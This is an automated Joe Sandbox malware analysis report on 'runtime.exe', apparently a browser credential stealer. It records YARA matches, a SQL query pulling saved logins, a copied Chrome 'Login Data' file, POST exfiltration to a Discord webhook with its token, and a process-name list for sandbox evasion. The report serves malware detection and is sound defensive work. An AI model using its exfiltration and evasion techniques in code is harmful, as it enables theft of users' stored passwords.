Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
runtime.exe

Overview

General Information

Sample name:runtime.exe
Analysis ID:1541872
MD5:f299098a2f6fbaa7902f87344c965525
SHA1:8b7e39918834826b0497243862b40671444fe939
SHA256:a799052d8068f5f2ecfefee27c690abb3f3de90bbd98e5b0a4459f0827b3fec2
Tags:antivmexestealeruser-Exteron01
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Yara signature match

Classification

  • System is w10x64
  • runtime.exe (PID: 1816 cmdline: "C:\Users\user\Desktop\runtime.exe" MD5: F299098A2F6FBAA7902F87344C965525)
    • conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
runtime.exeOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
  • 0x31dda8:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x330160:$string2: API call with %s database connection pointer
  • 0x3301c8:$string3: os_win.c:%d: (%lu) %s(%s) - %s
SourceRuleDescriptionAuthorStrings
0.2.runtime.exe.7ff7aa2b0000.0.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
  • 0x31dda8:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x330160:$string2: API call with %s database connection pointer
  • 0x3301c8:$string3: os_win.c:%d: (%lu) %s(%s) - %s
0.0.runtime.exe.7ff7aa2b0000.0.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
  • 0x31dda8:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x330160:$string2: API call with %s database connection pointer
  • 0x3301c8:$string3: os_win.c:%d: (%lu) %s(%s) - %s
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.7% probability
Source: runtime.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: runtime.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: blah.pdb source: runtime.exe
Source: Binary string: blah.pdb- source: runtime.exe
Source: global trafficHTTP traffic detected: POST /api/webhooks/1299085791254937640/Kk0DcgSpuWBwS9yryFX1nlEjkFwrVh2is32Q3WMk6aukk3R6R7FDurnupZArnouhEkR5 HTTP/1.1content-type: multipart/form-data; boundary=3d28d627302b1d54-3080abd9c0330841-eabd41003bdf51bb-1e53a08729f1926dcontent-length: 509accept: */*host: discord.com
Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: unknownHTTP traffic detected: POST /api/webhooks/1299085791254937640/Kk0DcgSpuWBwS9yryFX1nlEjkFwrVh2is32Q3WMk6aukk3R6R7FDurnupZArnouhEkR5 HTTP/1.1content-type: multipart/form-data; boundary=3d28d627302b1d54-3080abd9c0330841-eabd41003bdf51bb-1e53a08729f1926dcontent-length: 509accept: */*host: discord.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Oct 2024 07:11:16 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729840277x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IIP0D3aRQk1L8yXSNpYeaAjncrxByOMzUuOTJYf1Wi6GWpGqortYvk7BdDgt9jMyKoTcsEy5TMHF3uleOOXQiZzwkvZXIIyBDTGNb4LywP%2B0jM262N2y9Ghb5WB6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=672774b61d688e89340cc611b24790905df7aefa-1729840276; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Fm4XHW3.LuKeG.98VTGt97lVmseXkzzkM6wIbRC1bbA-1729840276066-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d80643cebfc2cc7-DFW
Source: runtime.exe, 00000000.00000003.2195626457.00000250EB311000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2203375590.00000250EB6F0000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2203375590.00000250EB6FF000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2193659488.00000250EB302000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2195626457.00000250EB302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: runtime.exe, 00000000.00000003.2195626457.00000250EB311000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2203375590.00000250EB6F0000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2203375590.00000250EB6FF000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2193659488.00000250EB302000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2195626457.00000250EB302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: runtime.exe, 00000000.00000003.2193659488.00000250EB302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digic
Source: runtime.exe, 00000000.00000003.2193659488.00000250EB302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digiccom/
Source: runtime.exe, 00000000.00000003.2195626457.00000250EB311000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2203375590.00000250EB6F0000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2203375590.00000250EB6FF000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2193659488.00000250EB302000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2195626457.00000250EB302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: runtime.exe, 00000000.00000003.2195626457.00000250EB311000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2203375590.00000250EB6F0000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2203375590.00000250EB6FF000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2193659488.00000250EB302000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2195626457.00000250EB302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: runtime.exe, 00000000.00000003.2207099867.00000250EB69E000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2193659488.00000250EB302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: runtime.exe, 00000000.00000003.2193659488.00000250EB302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: runtime.exe, 00000000.00000003.2203375590.00000250EB6F0000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2195626457.00000250EB302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: runtime.exe, 00000000.00000002.2238055806.00000250EB1E3000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2236714574.00000250EB618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1299085791254937640/Kk0DcgSpuWBwS9yryFX1nlEjkFwrVh2is32Q3WMk6aukk3R
Source: runtime.exeString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49712 version: TLS 1.2

System Summary

barindex
Source: runtime.exe, type: SAMPLEMatched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.runtime.exe.7ff7aa2b0000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.0.runtime.exe.7ff7aa2b0000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
Source: runtime.exe, 00000000.00000003.2203375590.00000250EB78A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameApplicationFrameHost.exej% vs runtime.exe
Source: runtime.exe, 00000000.00000003.2195109691.00000250EB39C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameApplicationFrameHost.exej% vs runtime.exe
Source: runtime.exe, type: SAMPLEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.runtime.exe.7ff7aa2b0000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.0.runtime.exe.7ff7aa2b0000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: runtime.exeBinary string: Failed to open \Device\Afd\Mio: Pb:@
Source: runtime.exeBinary string: CompletionPorthandle\Device\Afd\Mio
Source: classification engineClassification label: mal64.spyw.evad.winEXE@2/3@2/1
Source: C:\Users\user\Desktop\runtime.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data_copyJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
Source: runtime.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\runtime.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: runtime.exe, 00000000.00000000.2158386030.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmp, runtime.exe, 00000000.00000002.2239057789.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: runtime.exe, 00000000.00000000.2158386030.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmp, runtime.exe, 00000000.00000002.2239057789.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: runtime.exe, 00000000.00000000.2158386030.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmp, runtime.exe, 00000000.00000002.2239057789.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: runtime.exe, 00000000.00000000.2158386030.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmp, runtime.exe, 00000000.00000002.2239057789.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: runtime.exe, 00000000.00000000.2158386030.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmp, runtime.exe, 00000000.00000002.2239057789.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: runtime.exe, 00000000.00000000.2158386030.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmp, runtime.exe, 00000000.00000002.2239057789.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Login Data_copy0.0.dr, Login Data_copy.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: runtime.exe, 00000000.00000000.2158386030.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmp, runtime.exe, 00000000.00000002.2239057789.00007FF7AA5CE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: runtime.exeString found in binary or memory: aifcaiffairapplication/vnd.adobe.air-application-installer-package+zip
Source: runtime.exeString found in binary or memory: aifcaiffairapplication/vnd.adobe.air-application-installer-package+zip[
Source: runtime.exeString found in binary or memory: ghfapplication/vnd.groove-help
Source: runtime.exeString found in binary or memory: installapplication/x-install-instructions
Source: runtime.exeString found in binary or memory: /load_hpack; header malformed -- pseudo not at head of blockp
Source: unknownProcess created: C:\Users\user\Desktop\runtime.exe "C:\Users\user\Desktop\runtime.exe"
Source: C:\Users\user\Desktop\runtime.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\runtime.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: perfos.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Users\user\Desktop\runtime.exeSection loaded: kernel.appcore.dllJump to behavior
Source: runtime.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: runtime.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: runtime.exeStatic file information: File size 4795392 > 1048576
Source: runtime.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x31c200
Source: runtime.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x13e600
Source: runtime.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: runtime.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: blah.pdb source: runtime.exe
Source: Binary string: blah.pdb- source: runtime.exe

Malware Analysis System Evasion

barindex
Source: runtime.exeBinary or memory string: PROCEXP64.EXEPROCEXP.EXEPROCMON.EXEPROCMON64.EXEPESTUDIO.EXEKSDUMPER.EXEPRL_CC.EXEPRL_TOOLS.EXEPE-SIEVE64.EXEHOLLOWS_HUNTER32.EXEMONETA64.EXEFAKENET.EXEWIRESHARK.EXEVBOXSERVICE.EXEVMWAREUSER.EXEVMTOOLSD.EXEVMWARETRAY.EXEVMSRVC.EXEVGAUTHSERVICE.EXEVBOXTRAY.EXEC:\USERS\DOHANYZOE\.CARGO\REGISTRY\SRC\INDEX.CRATES.IO-6F17D22BBA15001F\ANTILYSIS-0.1.2\SRC\LIB.RS
Source: runtime.exe, 00000000.00000002.2238083196.00000250EB231000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2237021435.00000250EB231000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2237262559.00000250EB231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
Source: runtime.exe, 00000000.00000003.2172560634.00000250E9907000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: main Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evictions/sec5080Page Table Reclamations/sec508
Source: runtime.exe, 00000000.00000003.2172143994.00000250EB1E0000.00000004.00000020.00020000.00000000.sdmp, runtime.exe, 00000000.00000003.2183551030.00000250EB1E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4
